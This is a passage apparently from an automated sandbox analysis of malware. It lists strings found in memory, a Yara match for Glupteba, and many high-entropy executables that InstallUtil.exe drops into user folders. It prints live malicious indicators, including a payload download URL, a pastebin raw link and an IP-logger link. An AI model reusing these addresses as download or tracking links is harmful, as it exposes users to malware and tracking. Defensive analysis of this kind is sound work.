                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3151298469.000000000019B000.00000004.00000010.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/contact/.
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980476061.0000000002350000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000003.1980573238.00000000020F4000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000002.3178613149.0000000002100000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993807685.00000000020AC000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000003.1993674545.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173928635.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3173383330.000000000061A000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000002.3176112237.0000000002130000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2051912319.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2052026418.0000000002124000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2146250771.000000000213C000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3180040054.0000000000858000.00000004.00000020.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000002.3191413694.0000000002148000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000003.2138969685.0000000003230000.00000004.00001000.00020000.00000000.sdmp, mlSjlt4YcfcpuVp4aQsoCouK.exe, 00000022.00000003.2270698416.0000000002140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vovsoft.com/newsletter/
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/about/HJKFHDHD
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/contribute/md3ZS5maWxl
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/DkYFpuJBswV.exe
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: syncUpd.exe, 00000011.00000003.2938731044.0000000002300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: syncUpd.exe, 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.opera.com
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.opera.com..
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.opera.com/
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.opera.com/download/
                        Source: 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://www.opera.com/privacy
                        Source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpString found in binary or memory: https://www.whatsapp.com/legal;
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003270000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exe
                        Source: InstallUtil.exe, 00000008.00000002.3150096450.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://yip.su/RNWPd.exeChttps://pastebin.com/raw/HPj0MzD65https://iplogger.com/1luzz
                        Source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yip.su/redirect-
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_0040710B GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_0040710B

                        E-Banking Fraud

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Writes many files with high entropy
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99578787671Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\w9kWzhn3BOumuqtEzmPZdJ7I.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6kncXrojwkHyPQnSTc2Nn28Z.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\D2g51ebrTdw2dcv4PFU8OjS1.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\49zPHg8djprKbR3fbyK34TE8.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Xm54wLBRTMA3iYcjiLbASkwx.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1IQ1OhLwzIr1htrixbUaD3zt.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\I6q6xa8OpNqFa1GE2NL68OxV.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\t6FVjUQyIYOEGsrhSQAlAtYA.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\dvdyeMQ4IU05HT0hXUiampSM.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UpuXhVlAiE2lL81UfJ7rqxoG.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CS3CADtKPwRlkcskf1l0OgKj.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\M6twW38X7sVJZxeigqyEpnb7.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\wGeagqqn2DOY11i8cqkdcJ6l.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\f1VJcAMWETqBCjZqFoktlvLX.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NIrszCqD63mWfcibv0YdSwFl.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\ocxqlsVNXtyLzp2zpxnsa8Mt.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\RHfgbpolIV21eYBHVUExVm7m.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\rE439KsrV4PvRPEPLReHeUKA.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CYjxBxbX4468KtV9KoBZh2Bv.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PuOhjWfV8sy4waUuI70BLeKF.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\qfkuB5AfAibkngkYmzaWujj1.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\lXVa1j6vkIafyXGwBSkciSaS.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\K7OlehBeK7vDe9ywIcEpfFfd.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\2F22VRFSBNYWhRCIxmDEOfGG.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CtkVfcoX8wimAKTiEdjfwDJu.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gEy33b1wzb5JaeAUext9FbaV.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\JRoV34kN30OEKUZzqqQMQIaH.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bmLLVkqEoc8XwPP6fRiheZRk.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wQY4uiHIT1Rmw3D6dX7Mml4K.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\vMDfzN6ieihUJhAninw4nHZX.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\f6TPmOqJ9OCeCveaR02i6cCx.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xPkU0vAnxq9kCf406fqJmxI3.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\v88rIHAQvxZfLboOPn5cTWY9.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\CTBhrqB7vKJROnvunuZcUFAZ.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FIE2EI26EI4jGGv0xJtpXxXh.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\03oBcB8Rvh6nT71GnuDYAwPv.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\HPykbtSofo4ieesmLEyEOoa7.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\4mWZecCdz0lcVaculQKtsYsb.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FB8WWwveYgNXuiUkbF3okOil.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bphIzQx0dXuhocT7snNOGKWG.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\jCE8bXuh8rIt9xQkDFallzd3.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\dWXd3iKvKIXWjmhGzJ9IYi7c.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\BXPlhyu5Y5wZKxacaQ0MJ8m7.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\qtBU2wcdiddM8Ew6K9GV1QbJ.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\cJP9SLzzak6gFJD9JFpAVvaN.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\x04n3uUaS11tAr964Wnf0UiP.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\BOLsN3rxBHAIGUMuUJ7tVz6n.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ju6O9RRnwY5cmyJE9vtS2Jgt.exe entropy: 7.99483582496Jump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Opera_108.0.5067.24_Autoupdate_x64[1].exe entropy: 7.99996363398Jump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_package entropy: 7.99996363398Jump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_108.0.5067.24_Autoupdate_x64[1].exe entropy: 7.99997483973Jump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_package entropy: 7.99997484529Jump to dropped file

                        System Summary

                        barindex
